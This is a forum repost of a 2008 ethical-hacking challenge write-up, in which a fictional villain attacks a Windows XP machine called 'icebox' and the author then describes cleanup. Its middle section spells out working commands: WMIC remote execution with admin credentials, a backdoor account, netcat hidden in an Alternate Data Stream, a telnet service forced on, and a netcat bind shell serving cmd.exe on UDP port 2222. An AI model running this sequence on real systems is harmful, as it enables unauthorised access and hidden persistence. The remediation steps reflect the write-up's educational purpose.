HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 46 guests online
 
Advertisement

You are here: Home arrow Featuresarrow Skillzarrow Dec 07 - Frosty the Snow Crasharrow Skillz Dec 07 Winning Entry - Technical
EH-Net
May 18, 2013, 06:51:53 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Skillz Dec 07 Winning Entry - Technical  (Read 8336 times)
0 Members and 1 Guest are viewing this topic.
don
Editor-In-Chief
Administrator
Hero Member
*****
Offline Offline

Posts: 4165


Editor-In-Chief


View Profile WWW
« on: April 02, 2008, 12:31:35 PM »
Icetek

Quote

Melting? Not so fun..
A lesson Frost has learnt well
Secure is cool, yeah!!

Author: icetek  ~  circa 2008


## QUESTION 1 ##

# Frostinator’s temp check script – great idea, however, I found issues with it at two levels. First, when tested on my XP boxes I received the “Not Supported” response. This was likely due to the hardware I was testing on though. Secondly, and more importantly, for the boxes I did get it to work on the WMI interface will not update the temperature while it was running. The temp will display every 15 seconds, but, never refreshes until the system is rebooted. A utility that uses kernel mode drivers would have helped Frosty to get a constantly refreshing display. I found this out the hard way by testing on one of my systems when the temperature never deviated from 3132 kelvin - even though it was heating up all of the time.

C:\> wmic /namespace:\\root\wmi PATH MSAcpi_ThermalZoneTemperature get CurrentTemperature /every:15

## QUESTION 2 ##

# mr Magician's load check script. This script which is available on the evil magician's XP box is used to read information about the chosen computer (Frosty's). In this case, mr Magician is remotely obtaining the load percentage to find out when Frosty's load starts jumping. This does update properly!

C:\> wmic /node:icebox /user:administrator /password:happybirthday cpu get loadpercentage /every:15

# Now mr Magician is adding his own user "merry" with a password of "christmas" which he will login with later.

C:\> wmic /node:icebox /user:administrator /password:happybirthday process call create "cmd.exe /c net user merry christmas /add"

# mr Magician giving merry privileges on icebox's c$ share

C:\> net use * \\icebox\c$ christmas /u:merry

# Ingeniously we're utilizing Alternate Data Streams (ADS) to hide netcat on the remote system within another file. This will not change the target file size and may or may not alter the file date.

C:\> type c:\nc.exe > z:\windows\system32\wbem\wmic.exe:windows.exe

# Now we enable the telnet server on the remote system and make it start automatically from now on.

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call changestartmode "automatic"

# Now he starts the telnet service

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call startservice

# Time to log evil merry in..

C:\> telnet icebox
Login: merry
Password: *********

# Ok, now we've started the hidden netcat binary without dns resolution, using UDP, listening on port 2222 to execute a command prompt on connection.

C:\Documents and Settings\merry> wmic process call create "c:\windows\system32\wbem\wmic:exe:windows.exe -n -u -l -p 2222 -e cmd.exe"

# Enter the melting command in a cryptic manner

C:\> nc -u icebox 2222

<long maniacal screed>

# Since the command interpreter only grabs the first character at the beginning of each line and interprets spaces at the beginning of lines, the command ends up looking something like this:

FOR /L %I IN (1,0,2) DO @ECHO MELT

And Frosty begins his long, hot, painful melt of looping echoes... :-(

## QUESTION 3 ##

As far as getting back down to comfort levels quickly, probably the quickest way to expel mr Magician is to disconnect his system from the internet initially to prevent mr Magician from telnetting back in to do further damage.

Next, Frost needs to quickly kill the shell that is doing the @ECHO command. Rebooting the box or killing the cmd.exe process *if the box is responsive* should work.

On boot-up or after killing cmd.exe he needs to go into the services and disable the telnet server service and set it to not start automatically.

The streamed file can be "unstreamed" by copying it back to *itself* "copy c:\windows\system32\wbem\wmic.exe:windows.exe c:\nc.exe".  He might want to remove netcat as well. A good virus scan / root kit remover and firewall would have probably helped in detecting and possibly preventing the streamed file.

Finally, and *MOST* importantly, he needs to remove the "merry" user and update all of his passwords to passphrases with high complexity so that he'll never lose his cool again!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~icetek


Posted by Don
Logged
CISSP, MCSE, CSTA, Security+ SME
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.084 seconds with 25 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Free Business and Tech Magazines and eBooks

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.